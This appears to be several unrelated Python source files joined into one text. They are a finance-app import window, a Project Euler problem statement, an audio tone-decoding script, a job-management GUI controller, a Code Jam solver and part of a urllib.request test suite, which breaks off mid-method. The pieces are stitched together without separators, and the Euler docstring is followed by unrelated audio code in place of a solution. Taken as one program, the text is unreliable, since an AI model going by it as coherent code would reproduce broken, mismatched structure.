    import run. It is shown modally by the UI as soon as it's created on the
    UI side.
    """
    # --- View interface
    # close()
    # close_selected_tab()
    # set_swap_button_enabled(enabled: bool)
    # update_selected_pane()
    # show()
    #

    def __init__(self, mainwindow, target_account=None):
        super().__init__()
        if not hasattr(mainwindow, 'loader'):
            raise ValueError("Nothing to import!")
        self.mainwindow = mainwindow
        self.document = mainwindow.document
        self.app = self.document.app
        self._selected_pane_index = 0
        self._selected_target_index = 0

        def setfunc(index):
            # Whether the swap button applies depends on the chosen swap type.
            self.view.set_swap_button_enabled(self.can_perform_swap())
        self.swap_type_list = LinkedSelectableList(items=[
            "<placeholder> Day <--> Month",
            "<placeholder> Month <--> Year",
            "<placeholder> Day <--> Year",
            tr("Description <--> Payee"),
            tr("Invert Amounts"),
        ], setfunc=setfunc)
        self.swap_type_list.selected_index = SwapType.DayMonth
        self.panes = []
        self.import_table = ImportTable(self)

        self.loader = self.mainwindow.loader
        self.target_accounts = [
            a for a in self.document.accounts if a.is_balance_sheet_account()]
        self.target_accounts.sort(key=lambda a: a.name.lower())
        accounts = []
        for account in self.loader.accounts:
            if account.is_balance_sheet_account():
                entries = self.loader.accounts.entries_for_account(account)
                if len(entries):
                    # Avoid clashing with account names already in the document.
                    new_name = self.document.accounts.new_name(account.name)
                    if new_name != account.name:
                        self.loader.accounts.rename_account(account, new_name)
                    accounts.append(account)
        parsing_date_format = DateFormat.from_sysformat(self.loader.parsing_date_format)
        for account in accounts:
            target = target_account
            if target is None and account.reference:
                # Reuse the target a previous import bound to this reference.
                target = getfirst(
                    t for t in self.target_accounts if t.reference == account.reference
                )
            self.panes.append(
                AccountPane(self, account, target, parsing_date_format))

    # --- Private
    def _can_swap_date_fields(self, first, second): # 'day', 'month', 'year'
        pane = self.selected_pane
        if pane is None:
            return False
        return pane.can_swap_date_fields(first, second)

    def _invert_amounts(self, apply_to_all):
        if apply_to_all:
            panes = self.panes
        else:
            panes = [self.selected_pane]
        for pane in panes:
            entries = self.loader.accounts.entries_for_account(pane.account)
            # Dedupe on transactions so each split is inverted exactly once.
            txns = dedupe(e.transaction for e in entries)
            for txn in txns:
                for split in txn.splits:
                    split.amount = -split.amount
        self.import_table.refresh()

    def _refresh_target_selection(self):
        if not self.panes:
            return
        target = self.selected_pane.selected_target
        # Index 0 is "< New Account >"; existing targets start at 1.
        self._selected_target_index = 0
        if target is not None:
            try:
                self._selected_target_index = self.target_accounts.index(target) + 1
            except ValueError:
                pass

    def _refresh_swap_list_items(self):
        # Rewrite the three date-swap labels to show concrete format examples.
        if not self.panes:
            return
        items = []
        basefmt = self.selected_pane.parsing_date_format
        for first, second in [(DAY, MONTH), (MONTH, YEAR), (DAY, YEAR)]:
            swapped = swap_format_elements(basefmt, first, second)
            items.append("{} --> {}".format(basefmt.iso_format, swapped.iso_format))
        self.swap_type_list[:3] = items

    def _swap_date_fields(self, first, second, apply_to_all): # 'day', 'month', 'year'
        assert self._can_swap_date_fields(first, second)
        if apply_to_all:
            panes = [p for p in self.panes if p.can_swap_date_fields(first, second)]
        else:
            panes = [self.selected_pane]

        def switch_func(txn):
            txn.date = swapped_date(txn.date, first, second)

        self._swap_fields(panes, switch_func)
        # Now, let's change the date format on these panes
        for pane in panes:
            # Each pane's own format must be swapped: with apply_to_all, a
            # pane's format may differ from the selected pane's (previously
            # this read self.selected_pane.parsing_date_format for all panes).
            basefmt = pane.parsing_date_format
            swapped = swap_format_elements(basefmt, first, second)
            pane.parsing_date_format = swapped
            pane._sort_matches()
        self.import_table.refresh()
        self._refresh_swap_list_items()

    def _swap_description_payee(self, apply_to_all):
        if apply_to_all:
            panes = self.panes
        else:
            panes = [self.selected_pane]

        def switch_func(txn):
            txn.description, txn.payee = txn.payee, txn.description

        self._swap_fields(panes, switch_func)

    def _swap_fields(self, panes, switch_func):
        # A transaction can span several panes' accounts; track accounts
        # already processed so each transaction is switched only once.
        seen = set()
        for pane in panes:
            entries = self.loader.accounts.entries_for_account(pane.account)
            txns = dedupe(e.transaction for e in entries)
            for txn in txns:
                if txn.affected_accounts() & seen:
                    # We've already swapped this txn in a previous pane.
                    continue
                switch_func(txn)
            seen.add(pane.account)
        self.import_table.refresh()

    def _update_selected_pane(self):
        self.import_table.refresh()
        self._refresh_swap_list_items()
        self.view.update_selected_pane()
        self.view.set_swap_button_enabled(self.can_perform_swap())

    # --- Override
    def _view_updated(self):
        if self.document.can_restore_from_prefs():
            self.restore_view()
        # XXX Logically, we should call _update_selected_pane() but doing so
        # makes tests fail. To investigate.
        self._refresh_target_selection()
        self.view.update_selected_pane()
        self._refresh_swap_list_items()
        self.import_table.refresh()

    # --- Public
    def can_perform_swap(self):
        """Return whether the currently selected swap type can be applied."""
        index = self.swap_type_list.selected_index
        if index == SwapType.DayMonth:
            return self._can_swap_date_fields(DAY, MONTH)
        elif index == SwapType.MonthYear:
            return self._can_swap_date_fields(MONTH, YEAR)
        elif index == SwapType.DayYear:
            return self._can_swap_date_fields(DAY, YEAR)
        else:
            # Description<->Payee and Invert Amounts are always possible.
            return True

    def close_pane(self, index):
        """Remove the pane at *index*; close the window when none are left."""
        was_selected = index == self.selected_pane_index
        del self.panes[index]
        if not self.panes:
            self.view.close()
            return
        self._selected_pane_index = min(self._selected_pane_index, len(self.panes) - 1)
        if was_selected:
            self._update_selected_pane()

    def import_selected_pane(self):
        """Commit the selected pane's entries into the document and close it."""
        pane = self.selected_pane
        matches = pane.matches
        matches = [
            (e, ref) for ref, e in matches
            if e is not None and e not in self.import_table.dont_import]
        if pane.selected_target is not None:
            # We import in an existing account, adjust all the transactions accordingly
            target_account = pane.selected_target
        else:
            target_account = None
        self.document.import_entries(target_account, pane.account, matches)
        self.mainwindow.revalidate()
        self.close_pane(self.selected_pane_index)
        self.view.close_selected_tab()

    def match_entries_by_date_and_amount(self, threshold):
        self.selected_pane.match_entries_by_date_and_amount(threshold)
        self.import_table.refresh()

    def perform_swap(self, apply_to_all=False):
        """Apply the currently selected swap type, optionally to all panes."""
        index = self.swap_type_list.selected_index
        if index == SwapType.DayMonth:
            self._swap_date_fields(DAY, MONTH, apply_to_all=apply_to_all)
        elif index == SwapType.MonthYear:
            self._swap_date_fields(MONTH, YEAR, apply_to_all=apply_to_all)
        elif index == SwapType.DayYear:
            self._swap_date_fields(DAY, YEAR, apply_to_all=apply_to_all)
        elif index == SwapType.DescriptionPayee:
            self._swap_description_payee(apply_to_all=apply_to_all)
        elif index == SwapType.InvertAmount:
            self._invert_amounts(apply_to_all=apply_to_all)

    def restore_view(self):
        self.import_table.columns.restore_columns()

    # --- Properties
    @property
    def selected_pane(self):
        return self.panes[self.selected_pane_index] if self.panes else None

    @property
    def selected_pane_index(self):
        return self._selected_pane_index

    @selected_pane_index.setter
    def selected_pane_index(self, value):
        if value >= len(self.panes):
            return
        self._selected_pane_index = value
        self._refresh_target_selection()
        self._update_selected_pane()

    @property
    def selected_target_account(self):
        return self.selected_pane.selected_target

    @property
    def selected_target_account_index(self):
        return self._selected_target_index

    @selected_target_account_index.setter
    def selected_target_account_index(self, value):
        # Index 0 means "< New Account >" (no target).
        target = self.target_accounts[value - 1] if value > 0 else None
        self.selected_pane.selected_target = target
        self._selected_target_index = value
        self.import_table.refresh()

    @property
    def target_account_names(self):
        return [tr('< New Account >')] + [a.name for a in self.target_accounts]

#!/usr/bin/env python
# coding=utf-8

"""30. Digit fifth powers
https://projecteuler.net/problem=30

Surprisingly there are only three numbers that can be written as the sum of
fourth powers of their digits:

> 1634 = 1^4 + 6^4 + 3^4 + 4^4  
>  8208 = 8^4 + 2^4 + 0^4 + 8^4  
>  9474 = 9^4 + 4^4 + 7^4 + 4^4

As 1 = 1^4 is not a sum it is not included.

The sum of these numbers is 1634 + 8208 + 9474 = 19316.

Find the sum of all the numbers that can be written as the sum of fifth powers
of their digits.
"""

# Python 2 script: plays back a wav file while running a Goertzel filter over
# ~0.2 s chunks, then decodes a bit stream from the dominant frequency band
# of each chunk (decoding loop comes further below).
import sys, math
from test import goertzel
import wave
import pyaudio
import Queue
import numpy as np
if len(sys.argv) < 2:
    print "Usage: %s <filename> " % sys.argv[0]
    sys.exit(1)

filename = sys.argv[1]

# Open the wav file and derive the per-chunk frame count from its sample rate.
w = wave.open(filename)
fs = w.getframerate()
width = w.getsampwidth()
chunkDuration = .2 #.2 second chunks
chunk = int(chunkDuration*fs)
# NOTE(review): `window` (and the `math`/`Queue` imports) appear unused in
# this script — confirm whether they are leftovers.
window = np.blackman(chunk)

# Output stream matching the wav format: chunks are played while analyzed.
p = pyaudio.PyAudio()
stream = p.open(format = p.get_format_from_width(w.getsampwidth()), channels = w.getnchannels(),rate = fs, output=True)

#read .2 second chunk
data = w.readframes(chunk)
chunk_data = [] 
#find the frequencies of each chunk

print "Running calculations on wav file"
num = 0 
while data != '':
	print "Calculating Chunk " + str(num)
	stream.write(data)
	indata = np.array(wave.struct.unpack("%dh"%(len(data)/width),\
                                         data))
	freqs , results = goertzel(indata,fs, (1036,1058), (1567,1569), (2082,2104))

	chunk_data.append((freqs,results))
	
	data = w.readframes(chunk)
	num+=.2
stream.close()
p.terminate()

#finished getting data from chunks, now to parse the data

# Amplitude samples collected per frequency band (hi/lo/mid).
hi = []
lo = []
mid = []

#average first second of audio to get frequency baselines
for i in range (5):
	a = chunk_data[i][0]
	b = chunk_data[i][1]
	for j in range(len(a)):
		if a[j] > 1700:
			hi.append(b[j])
		elif a[j] < 1300:
			lo.append(b[j])
		else:
			mid.append(b[j])

# Per-band baseline amplitudes (assumes the first second carries no signal).
hi_average = sum(hi)/float(len(hi))
lo_average = sum(lo)/float(len(lo))
mid_average = sum(mid)/float(len(mid))


"""
Determine the frequency in each .2 second chunk that has the highest amplitude increase from its average, then determine the frequency 
of that second of data by the median frequency of its 5 chunks
"""
#looks for start signal in last 3 seconds of audio
def signal_found(arr):
	lst = arr[-15:]
	first = 0
	second = 0
	third = 0
	for i in range(0,5):
		if lst[i]=="mid":
			first += 1
	for i in range(5,10):
		if lst[i]=="mid":
			second += 1
	for i in range(10,15):
		if lst[i]=="mid":
			third += 1

	if first >= 5 and second >= 5 and third >= 5:
		return True
	else:
		return False		

#gets freq of 1 second of audio
def get_freq(arr):
	lo_count = 0
	hi_count = 0
	mid_count = 0
	for i in arr:
		if i=="lo":
			lo_count+=1
		if i=="hi":
			hi_count+=1
		if i=="mid":
			mid_count+=1

	if mid_count > hi_count and mid_count > lo_count:
		return 2
		
	if lo_count>hi_count:
		return 0
	else:
		return 1


# Decode the bit stream: classify each remaining chunk by the band whose
# amplitude rose most above its baseline, wait for the start signal (three
# full seconds of "mid"), then read one bit per second (5 chunks) until a
# "mid" second (get_freq() == 2) marks the stop signal.
start = False
freq_list = []
offset = 0
bits = []
for i in range(5,len(chunk_data)):
	a = chunk_data[i][0]
	b = chunk_data[i][1]
	hi_amp = []
	lo_amp = []
	mid_amp = []
	#get averages for each freq
	for j in range(len(a)):
		if a[j] > 1700:
			hi_amp.append(b[j])
		elif a[j] < 1300:
			lo_amp.append(b[j])
		else:
			mid_amp.append(b[j])

	hi_av = sum(hi_amp)/float(len(hi_amp))
	lo_av = sum(lo_amp)/float(len(lo_amp))
	mid_av = sum(mid_amp)/float(len(mid_amp))
	
	#get freq of this chunk
	diff = [lo_av-lo_average,mid_av-mid_average,hi_av-hi_average]
	index = diff.index(max(diff))
	if(index==0):
		freq_list.append("lo")
	if(index==1):
		freq_list.append("mid")
	if(index==2):
		freq_list.append("hi")

	print(freq_list[len(freq_list)-1])	
	if len(freq_list) > 5:
		if start:
			if len(freq_list)%5 == offset:
				bit = get_freq(freq_list[-5:])
				if bit != 2:
					bits.append(bit)
				else:
					print "Stop Signal Detected"
					break
		elif len(freq_list) >= 15:
			if signal_found(freq_list):
				print "signal found"
				start = True
				offset = len(freq_list)%5
			
			
		
print bits 	

from controllers.job_ctrl import JobController
from models.job_model import JobModel
from views.job_view import JobView


class MainController(object):
    """Top-level controller: wires the main view to the main model and
    manages per-job tabs."""

    def __init__(self, main_model):
        self.main_view = None
        self.main_model = main_model
        # React to the model's job-fetch lifecycle signals.
        self.main_model.begin_job_fetch.connect(self.on_begin_job_fetch)
        self.main_model.update_job_fetch_progress.connect(self.on_job_fetch_update)
        self.main_model.fetched_job.connect(self.on_fetched_job)

    def init_ui(self, main_view):
        self.main_view = main_view
        self.init_hotkeys()

    def init_hotkeys(self):
        # Global hotkeys -> view actions.
        bindings = (
            (["Lcontrol", "Lmenu", "J"], self.main_view.focus_job_num_edit),
            (["Lcontrol", "Lmenu", "O"], self.main_view.open_current_job_folder),
            (["Lcontrol", "Lmenu", "B"], self.main_view.open_current_job_basecamp),
        )
        hotkey_model = self.main_model.hotkey_model
        for combo, callback in bindings:
            hotkey_model.add_hotkey(combo, callback)
        hotkey_model.start_detection()

    def fetch_job(self):
        wanted = self.main_view.job_num
        if self.main_model.job_exists(wanted):
            self.main_view.show_job_already_exists_dialog()
            return
        self.main_model.fetch_job(wanted)

    def cancel_job_fetch(self):
        self.main_model.cancel_job_fetch()

    def on_begin_job_fetch(self, max):
        self.main_view.show_job_fetch_progress_dialog(max)

    def on_job_fetch_update(self, progress):
        self.main_view.update_job_fetch_progress_dialog(progress)

    def on_fetched_job(self, job_num, base_folder):
        settings = self.main_model.settings_model
        job = JobModel(
            job_num,
            base_folder,
            settings.basecamp_email,
            settings.basecamp_password,
            settings.google_maps_js_api_key,
            settings.google_maps_static_api_key,
            settings.google_earth_exe_path,
            settings.scene_exe_path)
        self.main_model.jobs[job.job_num] = job
        found = bool(job.base_folder)

        self.main_view.close_job_fetch_progress_dialog()

        if not found and not self.main_view.show_job_not_found_dialog():
            # Job folder missing and the user declined to open it anyway.
            return
        job_view = JobView(JobController(job))
        job_view.request_minimize.connect(self.main_view.close)
        self.main_view.add_tab(job_view, job.job_name)

    def remove_job(self, index):
        # Tab text is "#<job_num>"; strip the leading character to get the id.
        tab_label = self.main_view.ui.jobs_tab_widget.tabText(index)
        self.main_model.jobs.pop(int(tab_label[1:]), None)
        self.main_view.remove_tab(index)

#!/usr/bin/python
#
# Problem: Making Chess Boards
# Language: Python
# Author: KirarinSnow
# Usage: python thisfile.py <input.in >output.out 


from heapq import *

def process(r1, r2, c1, c2):
    """Recompute s[i][j] -- the side of the largest checkerboard square whose
    bottom-right corner is (i, j) -- for every in-bounds cell in the given
    rectangle, pushing (-size, i, j) on the heap q.

    Relies on module globals m, n (grid size), g (grid), s (DP table), q.
    """
    for row in range(r1, r2):
        for col in range(c1, c2):
            if not (0 <= row < m and 0 <= col < n):
                continue
            cell = g[row][col]
            if cell == None:
                # Cleared cell: no square can end here.
                size = 0
            elif row == 0 or col == 0:
                size = 1
            elif g[row-1][col] != cell and g[row][col-1] != cell and \
                    g[row-1][col-1] == cell:
                # Checkerboard pattern continues: extend the smallest neighbor.
                size = 1 + min(s[row-1][col], s[row][col-1], s[row-1][col-1])
            else:
                size = 1
            s[row][col] = size
            heappush(q, (-size, row, col))

def clear(r1, r2, c1, c2):
    """Blank out (set to None) every in-bounds cell of the global grid g in
    the rectangle [r1, r2) x [c1, c2)."""
    for row in range(r1, r2):
        for col in range(c1, c2):
            if 0 <= row < m and 0 <= col < n:
                g[row][col] = None
                
# For each case: read an m x n bit grid (rows given in hex), then greedily cut
# out the largest checkerboard square (via the heap), clear it, recompute the
# affected DP cells, and finally report how many squares of each size were cut.
for case in range(int(raw_input())):
    m, n = map(int, raw_input().split())
    # Each row arrives as a hex string; expand into n bits (MSB first).
    v = [eval('0x'+raw_input()) for i in range(m)]
    g = map(lambda x: map(lambda y: (x>>y)%2, range(n)[::-1]), v)
    
    # s[i][j] = side of the largest checkerboard square ending at (i, j).
    s = [[1 for i in range(n)] for j in range(m)]
    q = []
                                              
    process(0, m, 0, n)

    b = []
    while q:
        x, r, c = heappop(q)
        # x is the negated size; entries whose size no longer matches s are stale.
        if x != 0 and s[r][c] == -x:
            b.append((-x, r, c))
            clear(r+x+1, r+1, c+x+1, c+1)
            process(r+x+1, r-x+1, c+x+1, c-x+1)

    vs = sorted(list(set(map(lambda x: x[0], b))))[::-1]
    print "Case #%d: %d" % (case+1, len(vs))
    for k in vs:
        print k, len(filter(lambda x: x[0] == k, b))

from .gaussian_process import RandomFeatureGaussianProcess, mean_field_logits
from .spectral_normalization import SpectralNormalization

import unittest
from test import support

import os
import io
import socket

import urllib.request
from urllib.request import Request, OpenerDirector

# XXX
# Request
# CacheFTPHandler (hard to write)
# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler

class TrivialTests(unittest.TestCase):
    """Smoke tests for basic urllib.request behavior."""

    def test_trivial(self):
        # A couple trivial tests: urlopen() must reject a scheme-less URL.
        self.assertRaises(ValueError, urllib.request.urlopen, 'bogus url')

        # XXX Name hacking to get this to work on Windows.
        fname = os.path.abspath(urllib.request.__file__).replace('\\', '/')

        # And more hacking to get it to work on MacOS. This assumes
        # urllib.pathname2url works, unfortunately...
        if os.name == 'mac':
            fname = '/' + fname.replace(':', '/')

        file_url = ("file:///%s" if os.name == 'nt' else "file://%s") % fname

        response = urllib.request.urlopen(file_url)
        payload = response.read()
        response.close()

    def test_parse_http_list(self):
        cases = [
            ('a,b,c', ['a', 'b', 'c']),
            ('path"o,l"og"i"cal, example', ['path"o,l"og"i"cal', 'example']),
            ('a, b, "c", "d", "e,f", g, h',
             ['a', 'b', '"c"', '"d"', '"e,f"', 'g', 'h']),
            ('a="b\\"c", d="e\\,f", g="h\\\\i"',
             ['a="b"c"', 'd="e,f"', 'g="h\\i"'])]
        for raw, expected in cases:
            self.assertEqual(urllib.request.parse_http_list(raw), expected)


def test_request_headers_dict():
    # Doctest-carrying function: the docstring below IS the test content —
    # presumably collected by this module's doctest runner (not visible from
    # here; confirm). Do not edit the docstring without re-running doctests.
    """
    The Request.headers dictionary is not a documented interface.  It should
    stay that way, because the complete set of headers are only accessible
    through the .get_header(), .has_header(), .header_items() interface.
    However, .headers pre-dates those methods, and so real code will be using
    the dictionary.

    The introduction in 2.4 of those methods was a mistake for the same reason:
    code that previously saw all (urllib2 user)-provided headers in .headers
    now sees only a subset (and the function interface is ugly and incomplete).
    A better change would have been to replace .headers dict with a dict
    subclass (or UserDict.DictMixin instance?)  that preserved the .headers
    interface and also provided access to the "unredirected" headers.  It's
    probably too late to fix that, though.


    Check .capitalize() case normalization:

    >>> url = "http://example.com"
    >>> Request(url, headers={"Spam-eggs": "blah"}).headers["Spam-eggs"]
    'blah'
    >>> Request(url, headers={"spam-EggS": "blah"}).headers["Spam-eggs"]
    'blah'

    Currently, Request(url, "Spam-eggs").headers["Spam-Eggs"] raises KeyError,
    but that could be changed in future.

    """

def test_request_headers_methods():
    # Doctest-carrying function: the docstring below IS the test content —
    # presumably collected by this module's doctest runner (not visible from
    # here; confirm). Do not edit the docstring without re-running doctests.
    """
    Note the case normalization of header names here, to .capitalize()-case.
    This should be preserved for backwards-compatibility.  (In the HTTP case,
    normalization to .title()-case is done by urllib2 before sending headers to
    http.client).

    >>> url = "http://example.com"
    >>> r = Request(url, headers={"Spam-eggs": "blah"})
    >>> r.has_header("Spam-eggs")
    True
    >>> r.header_items()
    [('Spam-eggs', 'blah')]
    >>> r.add_header("Foo-Bar", "baz")
    >>> items = sorted(r.header_items())
    >>> items
    [('Foo-bar', 'baz'), ('Spam-eggs', 'blah')]

    Note that e.g. r.has_header("spam-EggS") is currently False, and
    r.get_header("spam-EggS") returns None, but that could be changed in
    future.

    >>> r.has_header("Not-there")
    False
    >>> print(r.get_header("Not-there"))
    None
    >>> r.get_header("Not-there", "default")
    'default'

    """


def test_password_manager(self):
    # NOTE(review): module-level function that takes `self` and whose body is
    # just a doctest docstring plus `pass` — the parameter is presumably a
    # leftover from a method version; confirm before changing the signature.
    # Do not edit the docstring without re-running doctests.
    """
    >>> mgr = urllib.request.HTTPPasswordMgr()
    >>> add = mgr.add_password
    >>> add("Some Realm", "http://example.com/", "joe", "password")
    >>> add("Some Realm", "http://example.com/ni", "ni", "ni")
    >>> add("c", "http://example.com/foo", "foo", "ni")
    >>> add("c", "http://example.com/bar", "bar", "nini")
    >>> add("b", "http://example.com/", "first", "blah")
    >>> add("b", "http://example.com/", "second", "spam")
    >>> add("a", "http://example.com", "1", "a")
    >>> add("Some Realm", "http://c.example.com:3128", "3", "c")
    >>> add("Some Realm", "d.example.com", "4", "d")
    >>> add("Some Realm", "e.example.com:3128", "5", "e")

    >>> mgr.find_user_password("Some Realm", "example.com")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/spam")
    ('joe', 'password')
    >>> mgr.find_user_password("Some Realm", "http://example.com/spam/spam")
    ('joe', 'password')
    >>> mgr.find_user_password("c", "http://example.com/foo")
    ('foo', 'ni')
    >>> mgr.find_user_password("c", "http://example.com/bar")
    ('bar', 'nini')

    Actually, this is really undefined ATM
##     Currently, we use the highest-level path where more than one match:

##     >>> mgr.find_user_password("Some Realm", "http://example.com/ni")
##     ('joe', 'password')

    Use latest add_password() in case of conflict:

    >>> mgr.find_user_password("b", "http://example.com/")
    ('second', 'spam')

    No special relationship between a.example.com and example.com:

    >>> mgr.find_user_password("a", "http://example.com/")
    ('1', 'a')
    >>> mgr.find_user_password("a", "http://a.example.com/")
    (None, None)

    Ports:

    >>> mgr.find_user_password("Some Realm", "c.example.com")
    (None, None)
    >>> mgr.find_user_password("Some Realm", "c.example.com:3128")
    ('3', 'c')
    >>> mgr.find_user_password("Some Realm", "http://c.example.com:3128")
    ('3', 'c')
    >>> mgr.find_user_password("Some Realm", "d.example.com")
    ('4', 'd')
    >>> mgr.find_user_password("Some Realm", "e.example.com:3128")
    ('5', 'e')

    """
    pass


def test_password_manager_default_port(self):
    # NOTE(review): like test_password_manager above, this is a module-level
    # function taking `self` whose docstring is the actual doctest content.
    # Do not edit the docstring without re-running doctests.
    """
    >>> mgr = urllib.request.HTTPPasswordMgr()
    >>> add = mgr.add_password

    The point to note here is that we can't guess the default port if there's
    no scheme.  This applies to both add_password and find_user_password.

    >>> add("f", "http://g.example.com:80", "10", "j")
    >>> add("g", "http://h.example.com", "11", "k")
    >>> add("h", "i.example.com:80", "12", "l")
    >>> add("i", "j.example.com", "13", "m")
    >>> mgr.find_user_password("f", "g.example.com:100")
    (None, None)
    >>> mgr.find_user_password("f", "g.example.com:80")
    ('10', 'j')
    >>> mgr.find_user_password("f", "g.example.com")
    (None, None)
    >>> mgr.find_user_password("f", "http://g.example.com:100")
    (None, None)
    >>> mgr.find_user_password("f", "http://g.example.com:80")
    ('10', 'j')
    >>> mgr.find_user_password("f", "http://g.example.com")
    ('10', 'j')
    >>> mgr.find_user_password("g", "h.example.com")
    ('11', 'k')
    >>> mgr.find_user_password("g", "h.example.com:80")
    ('11', 'k')
    >>> mgr.find_user_password("g", "http://h.example.com:80")
    ('11', 'k')
    >>> mgr.find_user_password("h", "i.example.com")
    (None, None)
    >>> mgr.find_user_password("h", "i.example.com:80")
    ('12', 'l')
    >>> mgr.find_user_password("h", "http://i.example.com:80")
    ('12', 'l')
    >>> mgr.find_user_password("i", "j.example.com")
    ('13', 'm')
    >>> mgr.find_user_password("i", "j.example.com:80")
    (None, None)
    >>> mgr.find_user_password("i", "http://j.example.com")
    ('13', 'm')
    >>> mgr.find_user_password("i", "http://j.example.com:80")
    (None, None)

    """

class MockOpener:
    """Opener stub that records the arguments of its last open()/error()
    call for later inspection by tests."""
    addheaders = []

    def open(self, req, data=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        self.req = req
        self.data = data
        self.timeout = timeout

    def error(self, proto, *args):
        self.proto = proto
        self.args = args

class MockFile:
    """File-like stub: accepts the usual read/readline/close signatures and
    returns nothing."""

    def read(self, count=None):
        pass

    def readline(self, count=None):
        pass

    def close(self):
        pass

class MockHeaders(dict):
    """Header mapping stub; getheaders() ignores the name and returns every
    stored value."""

    def getheaders(self, name):
        all_values = self.values()
        return list(all_values)

class MockResponse(io.StringIO):
    """In-memory response stub exposing code/msg/headers/url plus the
    StringIO read interface over `data`."""

    def __init__(self, code, msg, headers, data, url=None):
        io.StringIO.__init__(self, data)
        self.code = code
        self.msg = msg
        self.headers = headers
        self.url = url

    def info(self):
        return self.headers

    def geturl(self):
        return self.url

class MockCookieJar:
    """Cookie-jar stub that just records the request/response objects it was
    handed."""

    def add_cookie_header(self, request):
        self.ach_req = request

    def extract_cookies(self, response, request):
        self.ec_req = request
        self.ec_r = response

class FakeMethod:
    """Callable that forwards (meth_name, action, *args) to the given handle
    when invoked — used to synthesize handler methods on mock classes."""

    def __init__(self, meth_name, action, handle):
        self.meth_name = meth_name
        self.action = action
        self.handle = handle

    def __call__(self, *args):
        return self.handle(self.meth_name, self.action, *args)

class MockHTTPResponse(io.IOBase):
    # Minimal stand-in for http.client.HTTPResponse: stores the constructor
    # arguments and answers read()/info()/geturl() with canned values.
    def __init__(self, fp, msg, status, reason):
        self.fp = fp
        self.msg = msg
        self.status = status
        self.reason = reason
        # Hard-coded to 200 regardless of `status`.
        self.code = 200

    def read(self):
        # Always an empty body.
        return ''

    def info(self):
        return {}

    def geturl(self):
        # NOTE(review): self.url is never assigned anywhere in this class, so
        # geturl() raises AttributeError unless a caller sets .url externally
        # — confirm against the tests that use this mock before "fixing".
        return self.url


class MockHTTPClass:
    """Stand-in for http.client.HTTPConnection that records requests.

    An instance is used where a connection *class* is expected: calling
    the instance with (host, timeout) returns the instance itself, which
    then records the method, selector, headers and body of each
    request() made through it.
    """

    def __init__(self):
        self.level = 0
        self.req_headers = []
        self.data = None
        # When True, request() simulates a network failure at
        # endheaders time by raising socket.error.
        self.raise_on_endheaders = False
        self._tunnel_headers = {}

    def __call__(self, host, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        self.host = host
        self.timeout = timeout
        return self

    def set_debuglevel(self, level):
        self.level = level

    def _set_tunnel(self, host, port=None, headers=None):
        # Record CONNECT-tunnel parameters for later inspection.
        self._tunnel_host = host
        self._tunnel_port = port
        if headers:
            self._tunnel_headers = headers
        else:
            self._tunnel_headers.clear()

    def request(self, method, url, body=None, headers=None):
        self.method = method
        self.selector = url
        if headers is not None:
            self.req_headers += headers.items()
        self.req_headers.sort()
        if body:
            self.data = body
        if self.raise_on_endheaders:
            # Fix: removed the redundant local "import socket" — socket
            # is already required at class-definition time for the
            # __call__ default argument, so it must be imported at
            # module level anyway.
            raise socket.error()

    def getresponse(self):
        return MockHTTPResponse(MockFile(), {}, 200, "OK")

class MockHandler:
    # useful for testing handler machinery
    # see add_ordered_mock_handlers() docstring
    handler_order = 500
    def __init__(self, methods):
        self._define_methods(methods)
    def _define_methods(self, methods):
        # Each spec is either "name" (action None) or ("name", action).
        # A FakeMethod bound to self.handle is installed on the *class*
        # (not the instance), so callers must subclass per handler to
        # avoid cross-talk — see add_ordered_mock_handlers().
        for spec in methods:
            if len(spec) == 2: name, action = spec
            else: name, action = spec, None
            meth = FakeMethod(name, action, self.handle)
            setattr(self.__class__, name, meth)
    def handle(self, fn_name, action, *args, **kwds):
        # Record every call on the shared parent-opener log, then carry
        # out the scripted action for this method name.
        self.parent.calls.append((self, fn_name, args, kwds))
        if action is None:
            return None
        elif action == "return self":
            return self
        elif action == "return response":
            res = MockResponse(200, "OK", {}, "")
            return res
        elif action == "return request":
            return Request("http://blah/")
        elif action.startswith("error"):
            # "error NNN": funnel an HTTP error with code NNN (kept as a
            # string if not numeric) through the opener's error machinery.
            code = action[action.rfind(" ")+1:]
            try:
                code = int(code)
            except ValueError:
                pass
            res = MockResponse(200, "OK", {}, "")
            return self.parent.error("http", args[0], res, code, "", {})
        elif action == "raise":
            raise urllib.error.URLError("blah")
        assert False
    def close(self): pass
    def add_parent(self, parent):
        # Wire this handler to its opener and reset the shared call log.
        self.parent = parent
        self.parent.calls = []
    def __lt__(self, other):
        # Ordering used by OpenerDirector when sorting handlers.
        if not hasattr(other, "handler_order"):
            # No handler_order, leave in original order.  Yuck.
            return True
        return self.handler_order < other.handler_order

def add_ordered_mock_handlers(opener, meth_spec):
    """Create MockHandlers and add them to an OpenerDirector.

    meth_spec: list of lists of tuples and strings defining methods to define
    on handlers.  eg:

    [["http_error", "ftp_open"], ["http_open"]]

    defines methods .http_error() and .ftp_open() on one handler, and
    .http_open() on another.  These methods just record their arguments and
    return None.  Using a tuple instead of a string causes the method to
    perform some action (see MockHandler.handle()), eg:

    [["http_error"], [("http_open", "return request")]]

    defines .http_error() on one handler (which simply returns None), and
    .http_open() on another handler, which returns a Request object.

    Returns the list of created handlers.
    """
    handlers = []
    for offset, meths in enumerate(meth_spec):
        # A fresh subclass per handler, since MockHandler installs its
        # fake methods on the class, not the instance.
        class MockHandlerSubclass(MockHandler): pass
        handler = MockHandlerSubclass(meths)
        handler.handler_order += offset
        handler.add_parent(opener)
        handlers.append(handler)
        opener.add_handler(handler)
    return handlers

def build_test_opener(*handler_instances):
    """Return a fresh OpenerDirector with the given handlers installed."""
    opener = OpenerDirector()
    for handler in handler_instances:
        opener.add_handler(handler)
    return opener

class MockHTTPHandler(urllib.request.BaseHandler):
    """Handler that replays a canned response sequence.

    The first request is answered by pushing the configured code and
    headers through the opener's error machinery (useful for testing
    redirections and auth); every subsequent request gets a plain
    200 OK.
    """

    def __init__(self, code, headers):
        self.code = code
        self.headers = headers
        self.reset()

    def reset(self):
        self._count = 0
        self.requests = []

    def http_open(self, req):
        import email, http.client, copy
        from io import StringIO
        self.requests.append(copy.deepcopy(req))
        if self._count:
            # Second and later requests: succeed with an empty 200 body.
            self.req = req
            msg = email.message_from_string("\r\n\r\n")
